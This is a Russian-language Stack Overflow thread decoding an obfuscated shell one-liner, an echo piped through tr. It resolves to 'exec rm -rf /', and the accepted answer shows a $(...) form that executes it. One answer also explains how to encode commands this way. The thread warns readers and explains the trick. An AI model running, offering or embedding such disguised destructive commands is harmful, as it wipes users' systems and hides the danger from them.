# встретил непонятный код

Tags: linux

> **Внимание! Это сообщение содержит вредоносный код, который  запускает удаление файлов в системе, начиная с корневого каталога!**

Встретил данный код в скрипте но не понел что он делате объясните пожалуста

```
echo '%\%#{<-{}<&{`' |tr ' -/:-@[-`{}' '`-{/ -'
```

Comment: опять что-то типо [такого](https://ru.stackoverflow.com/questions/1144804/%d0%a7%d1%82%d0%be-%d0%b4%d0%b5%d0%bb%d0%b0%d0%b5%d1%82-%d0%b4%d0%b0%d0%bd%d0%bd%d1%8b%d0%b9-%d0%be%d0%b4%d0%bd%d0%be%d1%81%d1%82%d1%80%d0%be%d1%87%d0%bd%d0%b8%d0%ba-%d0%bd%d0%b0-perl)?

Comment: да, это снова пони. Какой то безопасник-мазохист решил проверить форум на устойчивость

Comment: команда `echo '%\%#{<-{}<&{\`' |tr ' -/:-@[-\`{}' '\`-{/ -'` выводит `exec rm -rf /`. потом исполняется. ох уж эти ксакепы…

Comment: @aleksandrbarakin, а Вы вот так проверяете это? Есть сервис или как-то вручную?

Comment: транслируем в уме, предварительно отбросив подозрительное.

Comment: @entithat, выполнение программы echo и передача её вывода программе tr явно ничего катастрофического сделать не смогут.

Comment: А как это вообще работает?

Comment: ага, только там есть `$(...)`. Правда умудренный опытом девопс решит, что доллар в начале - это просто показали, что не нужно от рута выполнять (приглашение командной строки). Поэтому, топик стартеру троечка за подготовку

Comment: @SKIP, по наличию меток можно сделать вывод, что данный вопрос преследует цель причинить ущерб максимальному числу пользователей

Comment: с таким же успехом могла быть вариация с ` (backtick), которую можно реже встретить на просторах интернета

Comment: Последнее время просто такие начали с  регулярной частотой появляться.

Comment: Ну хз. Я выполнил из под суперпользователя на главном рабочем сервере и у меня тут же пополнился счёт в сбербанке, Генри Форд подарил мне автомобиль, а Билл Гейтс раскрыл исходники винды. Шикарная программа - всем рекомендую.

Comment: @KoVadim И снова пони. Но когда я вижу что-то вроде перла, я уже сразу понимаю, что это... пони.

Comment: Да у них тут целый конезавод...

Comment: @donRumata - если у меня пополнится счет в Сбербанке и Генри Форд подарит машину - то что то тут явно пошло не так. их же уже давно нет

Comment: @entithat Я этой штукой настолько не владею, [зато](https://www.onworks.net/).

Comment: @KoVadim, https://media.giphy.com/media/j3HQ1zWosr1NS/giphy.gif

Answer (score 15, accepted):

---

### Внимание! **ОСТОРОЖНО!**

```bsh
$(echo '%\%#{<-{}<&{`' |tr ' -/:-@[-`{}' '`-{/ -')
```

инициирует команду

```
exec rm -rf /
```

Которая запускает удаление файлов в системе рекурсивно начиная с корневого каталога.

### **Не выполняйте.**

---

На мете уже было обсуждение подобного вопроса:
[Посмотреть обсуждение](https://ru.meta.stackoverflow.com/questions/10560/%D0%A2%D1%8B-%D1%82%D1%80%D0%BE%D1%8F%D0%BD%D1%81%D0%BA%D0%B0%D1%8F-%D0%BF%D0%BE%D0%BD%D0%B8-%D1%82%D1%80%D0%BE%D1%8F%D0%BD%D1%81%D0%BA%D0%B0%D1%8F-%D0%BF%D0%BE%D0%BD%D0%B8-%D0%9A%D0%B0%D0%BA-%D0%B7%D0%B0%D1%89%D0%B8%D1%82%D0%B8%D1%82%D1%8C%D1%81%D1%8F-%D0%BE%D1%82-%D0%B2%D0%BE%D0%BF%D1%80%D0%BE%D1%81%D0%BE%D0%B2-%D1%81-%D0%B2%D1%80%D0%B5%D0%B4%D0%BE%D0%BD%D0%BE%D1%81%D0%BD%D1%8B%D0%BC)

Comment: я бы большими красными буквами писал бы

Comment: @KoVadim, я, к сожалению, не знаю как изменить цвет текста в ответе...

Comment: @PotroNik кажется только картинкой

Comment: @SKIP [угу](https://meta.stackexchange.com/questions/115455/having-font-color-option-in-stack-overflow-question-editor)

Comment: Вот Вам и "Хороший ответ":)

Answer (score 14):

> ```
> echo '%\%#{<-{}<&{`' |tr ' -/:-@[-`{}' '`-{/ -'
> ```

Данная команда выводит строку `exec rm -rf /`. выполнять эту строку как команду — не стоит.

---

B более удобочитаемом варианте: `echo 'строка' | tr 'набор1' 'набор2'`

- набор1:  `` -/:-@[-`{} ``

  здесь мы видим три последовательности (см. [описание "c-c range" в *extended description*](https://pubs.opengroup.org/onlinepubs/9699919799/utilities/tr.html)):

  - `-/` — это последовательность символов от пробела (код `0x20`) до `/` (код `0x2f`). разворачивается в строку:  `!"#$%&'()*+,-./`
  - `:-@` — это последовательность символов от `:` (код `0x3a`) до `@` (код `0x40`). разворачивается в строку: `:;<=>?@`
  - `` [-` `` — это последовательность символов от `[` (код `0x5b`) до `` ` `` (код `0x60`). разворачивается в строку: `` []^_` ``
- набор2: `` `-{/ - ``

  здесь одна последовательность:

  - `` `-{ `` — это последовательность символов от `` ` `` (код `0x60`) до `{` (код `0x7b`). разворачивается в строку: `` `abcdefghijklmnopqrstuvwxyz{ ``

Tаким образмо получаем таблицу перекодировки (исходный символ и код, конечный символ и код):

```
  20   ` 60        
! 21   a 61        
" 22   b 62        
# 23   c 63        
$ 24   d 64        
% 25   e 65        
& 26   f 66        
' 27   g 67        
( 28   h 68        
) 29   i 69        
* 2a   j 6a        
+ 2b   k 6b        
, 2c   l 6c        
- 2d   m 6d        
. 2e   n 6e        
/ 2f   o 6f        
: 3a   p 70        
; 3b   q 71        
< 3c   r 72        
= 3d   s 73        
> 3e   t 74        
? 3f   u 75        
@ 40   v 76        
[ 5b   w 77        
\ 5c   x 78        
] 5d   y 79        
^ 5e   z 7a        
_ 5f   { 7b        
` 60   / 2f        
{ 7b     20        
} 7d   - 2d
```

глядя в эту таблицу, уже совсем несложно понять, как `%` превратился в `e`, а `\` — в `x`.

---

Kстати, если поменять наборы местами (т.е. поменять местами аргументы программы *tr*), то можно конструировать разные «зашифрованные» строки. вот, например, как была получена строка из вопроса:

```
$ echo 'exec rm -rf /' | tr '`-{/ -' ' -/:-@[-`{}'
%\%#{<-{}<&{`
```